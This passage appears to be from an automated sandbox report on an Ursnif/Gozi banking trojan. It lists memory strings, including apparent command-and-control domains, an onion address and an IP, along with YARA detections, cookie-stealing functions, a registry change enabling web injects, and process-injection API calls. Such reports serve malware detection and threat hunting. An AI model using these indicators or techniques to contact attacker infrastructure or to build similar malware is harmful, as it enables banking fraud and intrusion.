Source: control.exe, 0000000D.00000002.327809364.00000000002AE000.00000004.00000001.sdmp, control.exe, 0000000E.00000002.377395710.00000000007DE000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.485504696.0000000004F50000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000010.00000002.523571925.000002413CA3E000.00000004.00000001.sdmp, rundll32.exe, 00000011.00000002.328442434.000001EA0414E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000012.00000003.489186480.000001E766830000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000013.00000003.491218857.00000209AC190000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000015.00000003.492845933.000001598A140000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000003.494462793.000001F9FFE00000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: control.exe, 0000000D.00000003.325391949.000002ADA921C000.00000004.00000040.sdmp, control.exe, 0000000E.00000003.374902025.000001A4D17FC000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000000.354159270.00000000100DC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000010.00000003.501796313.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000011.00000002.328620335.000001EA0462C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000012.00000003.501797062.000001E766A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000013.00000003.501847968.00000209ABB13000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000015.00000003.501797398.000001598A202000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000002.527754850.000001F9FFC02000.00000004.00000001.sdmp | String found in binary or memory: http://ey7kuuklgieop2pq.onion
Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.342491859.00000000089FF000.00000004.00000001.sdmp | String found in binary or memory: http://google.com/
Source: control.exe, 0000000D.00000002.327809364.00000000002AE000.00000004.00000001.sdmp, control.exe, 0000000E.00000002.377395710.00000000007DE000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.485504696.0000000004F50000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000010.00000002.523571925.000002413CA3E000.00000004.00000001.sdmp, rundll32.exe, 00000011.00000002.328442434.000001EA0414E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000012.00000003.489186480.000001E766830000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000013.00000003.491218857.00000209AC190000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000015.00000003.492845933.000001598A140000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000003.494462793.000001F9FFE00000.00000004.00000001.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Of these, only shoshanna.at (87.106.18.141, the host behind the Snort alerts) was actually contacted in this run. buismashallah.at appears solely as a memory string and is likely a second C2 host from the bot's configuration; constitution.org/usdeclar.txt is a legitimate site that this family references and should be treated as a hunting hint, not as malicious infrastructure. fontfabrik.com and google.com come from explorer.exe's own memory, not from the sample.
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: http://maps.google.de/maps?hl=de&tab=wl
            Source: explorer.exe, 0000000F.00000003.488041253.000000000F9A1000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000000.348134498.000000000DCAF000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/WebPage
            Source: RuntimeBroker.exe, 00000016.00000002.527754850.000001F9FFC02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000003.442079920.000001F9FFA13000.00000004.00000001.sdmpString found in binary or memory: http://shoshanna.at
            Source: control.exe, 0000000E.00000003.374902025.000001A4D17FC000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000000.354159270.00000000100DC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000010.00000002.523012050.000002413C913000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000012.00000003.501797062.000001E766A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000013.00000003.501847968.00000209ABB13000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000015.00000003.501797398.000001598A202000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000003.442079920.000001F9FFA13000.00000004.00000001.sdmpString found in binary or memory: http://shoshanna.athttp://buismashallah.at
            Source: rundll32.exe, 00000011.00000002.328620335.000001EA0462C000.00000004.00000040.sdmpString found in binary or memory: http://shoshanna.athttp://buismashallah.at%
            Source: control.exe, 0000000D.00000003.325391949.000002ADA921C000.00000004.00000040.sdmpString found in binary or memory: http://shoshanna.athttp://buismashallah.atQ
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: http://translate.google.de/?hl=de&tab=wT
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: http://video.google.de/?hl=de&tab=wv
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.342369174.000000000899B000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/LocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedTue
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/setprefdomain?prefdom=DE&amp;prev=http://www.google.de/&amp;sig=K_D9RthfU2DxpZ
            Source: explorer.exe, 0000000F.00000003.487989608.000000000F971000.00000004.00000040.sdmpString found in binary or memory: http://www.google.com/setprefdomain?prefdom=DE&amp;prev=http://www.google.de/&amp;sig=K_v4zgA6MPUf-M
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: http://www.google.de/history/optout?hl=de
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: http://www.google.de/imghp?hl=de&tab=wi
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: http://www.google.de/preferences?hl=de
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: http://www.youtube.com/?gl=DE&tab=w1
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=de&passive=true&continue=http://www.google.com/&ec=GAZAA
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmpString found in binary or memory: https://apis.google.com
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://books.google.de/?hl=de&tab=wp
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://news.google.com/?tab=wn
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://play.google.com/?hl=de&tab=w8
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmpString found in binary or memory: https://plusone.google.com/u/0
            Source: explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://www.google.de/intl/de/about/products?tab=wh
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://www.google.de/shopping?hl=de&source=og&tab=wf
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://www.google.de/webhp?tab=ww

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif
            Source: Yara match | File source: 00000016.00000003.494462793.000001F9FFE00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000003.492845933.000001598A140000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001A.00000002.486145705.000000000092D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000003.489186480.000001E766830000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.523571925.000002413CA3E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000019.00000003.368704719.000002EEDF6F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000003.491218857.00000209AC190000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001E.00000003.385751279.000002AFF3B90000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001C.00000002.377887013.000002443596E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.515418751.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.525641924.000001F9FF17E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000003.485504696.0000000004F50000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000002.407827264.000000000299D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.327809364.00000000002AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000003.406559258.0000000000770000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000003.487533032.000002413CBD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.524005324.000002413CB3E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.527559598.000001F9FFA2E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.516931304.000001E76679E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000002.521823311.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.328442434.000001EA0414E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000003.326429634.000001EA03E90000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000002.523394119.00000209AC3BE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.527295888.000001F9FF96E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001F.00000003.410971539.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.377395710.00000000007DE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000002.516710517.000001598A16E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000003.317519202.000001A4CF920000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001A.00000003.383919098.00000000008A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.524405231.000002413CBFE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000002.515033269.0000015989FDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000000.338227300.000000000701E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000018.00000002.435140531.00000207B76AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000002.516037989.000001598A0AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000003.319348534.000002ADA73F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001C.00000003.376270736.00000244358E0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001E.00000002.505329521.000002AFF3C7E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000002.522755619.00000209AC2FE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.517273207.000001E76685E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000003.322573537.0000000004F20000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001F.00000002.502120858.000000000480D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000019.00000002.490824875.000002EEDF87E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4448, type: MEMORY
            Source: Yara match | File source: Process Memory Space: control.exe PID: 7096, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
            Source: Yara match | File source: Process Memory Space: control.exe PID: 7116, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 5848, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4540, type: MEMORY

            E-Banking Fraud:

            Detected Gozi e-Banking trojan
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 26_2_0091D75A
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 26_2_0091D75A
            Yara detected Ursnif
            Source: Yara match | File source: 00000016.00000003.494462793.000001F9FFE00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000003.492845933.000001598A140000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001A.00000002.486145705.000000000092D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000003.489186480.000001E766830000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.523571925.000002413CA3E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000019.00000003.368704719.000002EEDF6F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000003.491218857.00000209AC190000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001E.00000003.385751279.000002AFF3B90000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001C.00000002.377887013.000002443596E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.515418751.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.525641924.000001F9FF17E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000003.485504696.0000000004F50000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000002.407827264.000000000299D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.327809364.00000000002AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000003.406559258.0000000000770000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000003.487533032.000002413CBD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.524005324.000002413CB3E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.527559598.000001F9FFA2E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.516931304.000001E76679E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000002.521823311.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.328442434.000001EA0414E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000003.326429634.000001EA03E90000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000002.523394119.00000209AC3BE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.527295888.000001F9FF96E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001F.00000003.410971539.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.377395710.00000000007DE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000002.516710517.000001598A16E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000003.317519202.000001A4CF920000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001A.00000003.383919098.00000000008A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.524405231.000002413CBFE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000002.515033269.0000015989FDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000000.338227300.000000000701E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000018.00000002.435140531.00000207B76AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000002.516037989.000001598A0AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000003.319348534.000002ADA73F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001C.00000003.376270736.00000244358E0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001E.00000002.505329521.000002AFF3C7E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000002.522755619.00000209AC2FE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.517273207.000001E76685E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000003.322573537.0000000004F20000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001F.00000002.502120858.000000000480D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000019.00000002.490824875.000002EEDF87E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4448, type: MEMORY
            Source: Yara match | File source: Process Memory Space: control.exe PID: 7096, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
            Source: Yara match | File source: Process Memory Space: control.exe PID: 7116, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 5848, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4540, type: MEMORY
            Disables SPDY (HTTP compression, likely to perform web injects)
            Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_03174459 memcpy,LdrInitializeThunk,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,FindCloseChangeNotification,memset, 3_2_03174459
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_03173D76 NtMapViewOfSection,RtlNtStatusToDosError, 3_2_03173D76
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_03171071 NtCreateSection,memset,RtlNtStatusToDosError,NtClose, 3_2_03171071
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_03172892 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_03172892
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_03171288 LdrInitializeThunk,GetProcAddress,NtWow64ReadVirtualMemory64, 3_2_03171288
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_031713A6 GetModuleHandleA,GetModuleHandleA,NtGetContextThread,NtGetContextThread,LdrInitializeThunk, 3_2_031713A6
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_031732A8 NtQuerySystemInformation,RtlNtStatusToDosError, 3_2_031732A8
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_031712DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 3_2_031712DC
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_031718F2 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_031718F2
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_0317553C NtGetContextThread, 3_2_0317553C
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_03175269 memset,LdrInitializeThunk,NtQueryInformationProcess, 3_2_03175269
            Source: C:\Windows\System32\control.exe | Code function: 13_2_0027E25C NtMapViewOfSection, 13_2_0027E25C
            Source: C:\Windows\System32\control.exe | Code function: 13_2_0027E36C NtAllocateVirtualMemory, 13_2_0027E36C
            Source: C:\Windows\System32\control.exe | Code function: 13_2_00293C40 NtQueryInformationToken,NtQueryInformationToken,NtClose, 13_2_00293C40
            Source: C:\Windows\System32\control.exe | Code function: 13_2_00277CF4 RtlAllocateHeap,NtCreateSection,NtUnmapViewOfSection,FindCloseChangeNotification, 13_2_00277CF4
            Source: C:\Windows\System32\control.exe | Code function: 13_2_00280570 NtSetContextThread, 13_2_00280570
            Source: C:\Windows\System32\control.exe | Code function: 13_2_0027B5BC NtReadVirtualMemory, 13_2_0027B5BC
            Source: C:\Windows\System32\control.exe | Code function: 13_2_0029AEAC NtWriteVirtualMemory, 13_2_0029AEAC
            Source: C:\Windows\System32\control.exe | Code function: 13_2_0029D6AC NtQueryInformationProcess, 13_2_0029D6AC
            Source: C:\Windows\System32\control.exe | Code function: 13_2_00292F88 NtQueryInformationProcess, 13_2_00292F88
            Source: C:\Windows\System32\control.exe | Code function: 13_2_002B1004 NtProtectVirtualMemory,NtProtectVirtualMemory, 13_2_002B1004
            Source: C:\Windows\System32\control.exe | Code function: 14_2_007AE25C NtMapViewOfSection, 14_2_007AE25C
            Source: C:\Windows\System32\control.exe | Code function: 14_2_007AE36C NtAllocateVirtualMemory, 14_2_007AE36C
            Source: C:\Windows\System32\control.exe | Code function: 14_2_007C3C40 NtQueryInformationToken,NtQueryInformationToken,NtClose, 14_2_007C3C40
            Source: C:\Windows\System32\control.exe | Code function: 14_2_007A7CF4 RtlAllocateHeap,NtCreateSection,NtUnmapViewOfSection,FindCloseChangeNotification, 14_2_007A7CF4
